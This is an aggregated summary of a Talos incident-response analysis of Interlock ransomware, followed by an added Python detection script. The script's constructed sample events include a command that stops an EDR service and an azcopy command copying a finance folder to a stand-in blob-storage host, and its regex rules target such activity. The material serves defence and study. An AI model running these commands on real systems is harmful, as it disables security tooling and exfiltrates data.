Cisco Talos Blog: Unwrapping the emerging Interlock ransomware attack

Source URL: https://blog.talosintelligence.com/emerging-interlock-ransomware/
Source: Cisco Talos Blog
Title: Unwrapping the emerging Interlock ransomware attack

Feedly Summary: Cisco Talos Incident Response (Talos IR) recently observed an attacker conducting big-game hunting and double extortion attacks using the relatively new Interlock ransomware.

AI Summary and Description: Yes

Summary: The analysis by Cisco Talos Incident Response gives an in-depth overview of the Interlock ransomware, covering its delivery mechanism, post-compromise tooling, and operational tactics. It illustrates the structure of a modern big-game hunting and double extortion intrusion, including the abuse of legitimate Azure storage utilities for data exfiltration, and is relevant to organizations across sectors, not only those running cloud infrastructure.

Detailed Description: Cisco Talos Incident Response has identified and analyzed a new player in the ransomware landscape known as Interlock. This report outlines the attack flow, tools, and techniques used by the attackers, including the use of Azure storage tooling for exfiltration, which has implications for cloud and infrastructure security.

Key Points of Analysis:

* **Overview of Ransomware**:
– The Interlock operators conduct big-game hunting and double extortion; observed targets span a broad range of organizations in sectors such as healthcare, government, and technology.

* **Delivery Mechanism**:
– Initial payload is a Remote Access Tool (RAT) disguised as a browser updater.
– Follows up with PowerShell scripts, a credential stealer, and a keylogger to maintain access and harvest credentials and other information.

* **Lateral Movement**:
– Predominantly uses Remote Desktop Protocol (RDP) for lateral movement, alongside tools such as AnyDesk and PuTTY.
– Exfiltrates data to an Azure storage blob using the legitimate Azure Storage Explorer and AzCopy utilities; because these are signed, widely used tools, defenders cannot rely on blocking unknown binaries alone and should monitor for unexpected connections to blob storage endpoints.

* **Duration in Environment**:
– The attackers dwelled in the compromised network for approximately 17 days between initial access and ransomware deployment.

* **Operational Tactics**:
– Gained initial access through social engineering (a fake software download).
– Established persistence with a startup item that launches the RAT when a user logs in.

* **Defense Evasion**:
– The attackers disabled Endpoint Detection and Response (EDR) tooling ahead of deployment; an unexpected loss of EDR telemetry from a host is therefore itself a high-priority alert condition.

* **Exfiltration and Impact**:
– Data is exfiltrated to an Azure storage blob, and the attackers threaten to leak the stolen data if the ransom is not paid (double extortion).

* **Ransomware Features**:
– Both Windows and Linux variants of the Interlock ransomware have been identified.
– Encryption uses a symmetric block cipher in Cipher Block Chaining (CBC) mode together with RSA; CBC is a standard block-cipher mode rather than a novel technique, and the combination with RSA means files cannot be recovered without the attackers' private key.

* **Comparison with Other Ransomware**:
– Overlaps between Interlock and Rhysida ransomware suggest a possible affiliation or shared code, consistent with a broader trend of cooperation among ransomware groups.

* **Cisco Security Solutions**:
– Talos recommends Cisco products like Secure Endpoint, Secure Email, and Umbrella to defend against these attacks, emphasizing integrated security approaches.
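As an added detection-side illustration (not code from Talos or the blog post), the following Python triages a handful of constructed Sysmon-style events against the stages listed above: the updater lure, startup-item persistence, RDP/remote-tool use, service tampering of the kind used to disable EDR, and AzCopy/Storage Explorer activity pointed at a blob endpoint. Every path, host, user, and service name in it is a made-up assumption, and the rules are deliberately coarse heuristics rather than published indicators.

```python
# Added example (not Talos code): heuristic triage of the intrusion stages
# summarised above, run over a handful of constructed Sysmon-style events.
# Field names, rule logic and every path, host and service name below are
# assumptions for illustration, not indicators published by Talos.
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str           # "process", "registry" or "file"
    image: str          # image path of the acting process
    cmdline: str = ""   # command line (process events only)
    target: str = ""    # registry value or file path written (registry/file)
    user: str = ""


STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
CLOUD_TOOLS = {"azcopy.exe", "storageexplorer.exe", "microsoftazurestorageexplorer.exe"}
BLOB_HOST = re.compile(r"\.blob\.core\.windows\.net", re.I)
REMOTE_TOOLS = {"mstsc.exe", "anydesk.exe", "putty.exe"}
SERVICE_TAMPER = re.compile(r"\b(sc(\.exe)?\s+(stop|delete|config)|stop-service|taskkill)\b", re.I)
UPDATER_NAME = re.compile(r"updat\w*\.exe$", re.I)
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData)\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_delivery(e):
    # An "updater" binary launched from Downloads/AppData matches the fake
    # browser-updater lure; genuine updaters normally live under Program Files.
    if e.kind == "process" and USER_WRITABLE.search(e.image) and UPDATER_NAME.search(basename(e.image)):
        return "Delivery", "updater-named executable run from a user-writable path"


def rule_persistence(e):
    if e.kind == "file" and STARTUP_DIR.search(e.target):
        return "Persistence", "item written to the Startup folder"
    if e.kind == "registry" and RUN_KEY.search(e.target):
        return "Persistence", "Run/RunOnce key value set"


def rule_lateral(e):
    if e.kind == "process" and basename(e.image) in REMOTE_TOOLS:
        return "Lateral Movement", f"remote-access tool {basename(e.image)} launched"


def rule_evasion(e):
    # Coarse on purpose: any service stop/delete or process kill. Narrow it to
    # your EDR's own service and process names before deploying.
    if e.kind == "process" and SERVICE_TAMPER.search(e.cmdline):
        return "Defense Evasion", "service/process tampering command"


def rule_exfil(e):
    # Legitimate Azure tooling pointed at a blob endpoint; in production,
    # allow-list the storage accounts your organisation actually uses.
    if e.kind == "process" and basename(e.image) in CLOUD_TOOLS and BLOB_HOST.search(e.cmdline):
        return "Exfiltration", "Azure storage tool targeting a blob endpoint"


RULES = (rule_delivery, rule_persistence, rule_lateral, rule_evasion, rule_exfil)


def triage(events):
    """Return (event_index, stage, detail) for every rule that fires."""
    findings = []
    for i, e in enumerate(events):
        for rule in RULES:
            hit = rule(e)
            if hit:
                findings.append((i, *hit))
    return findings


def stages_seen(findings):
    """Distinct stages observed, in the order the summary lists them."""
    order = ["Delivery", "Persistence", "Lateral Movement", "Defense Evasion", "Exfiltration"]
    seen = {stage for _, stage, _ in findings}
    return [s for s in order if s in seen]


# Constructed sample telemetry (not real logs); names and addresses are made up.
SAMPLE = [
    Event("process", r"C:\Users\jdoe\Downloads\ChromeUpdate.exe", cmdline="ChromeUpdate.exe", user="jdoe"),
    Event("file", r"C:\Users\jdoe\Downloads\ChromeUpdate.exe",
          target=r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk"),
    Event("process", r"C:\Windows\System32\mstsc.exe", cmdline="mstsc.exe /v:10.0.0.25"),
    Event("process", r"C:\Windows\System32\sc.exe", cmdline="sc stop ExampleEdrService"),
    Event("process", r"C:\Tools\azcopy.exe",
          cmdline='azcopy copy "D:\\Finance" "https://example.blob.core.windows.net/c?sv=2023&sig=CONSTRUCTED" --recursive'),
    Event("process", r"C:\Windows\System32\notepad.exe", cmdline="notepad.exe"),
]

if __name__ == "__main__":
    for idx, stage, detail in triage(SAMPLE):
        print(f"event {idx}: [{stage}] {detail}")
    print("stages:", stages_seen(triage(SAMPLE)))
```

Run stand-alone, the script flags five of the six sample events, one per stage, and leaves the notepad event alone. Each rule in isolation is noisy (administrators run AzCopy and RDP too); the value is in correlating several stages on the same host or user within a short window, which is what the roughly 17-day dwell time leaves room for.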

This comprehensive analysis provides critical insights into the evolving ransomware threat landscape, underlining the necessity for robust security strategies, especially for organizations utilizing cloud-based infrastructures. Security professionals should prioritize understanding these threat vectors to enhance their defenses against future ransomware campaigns.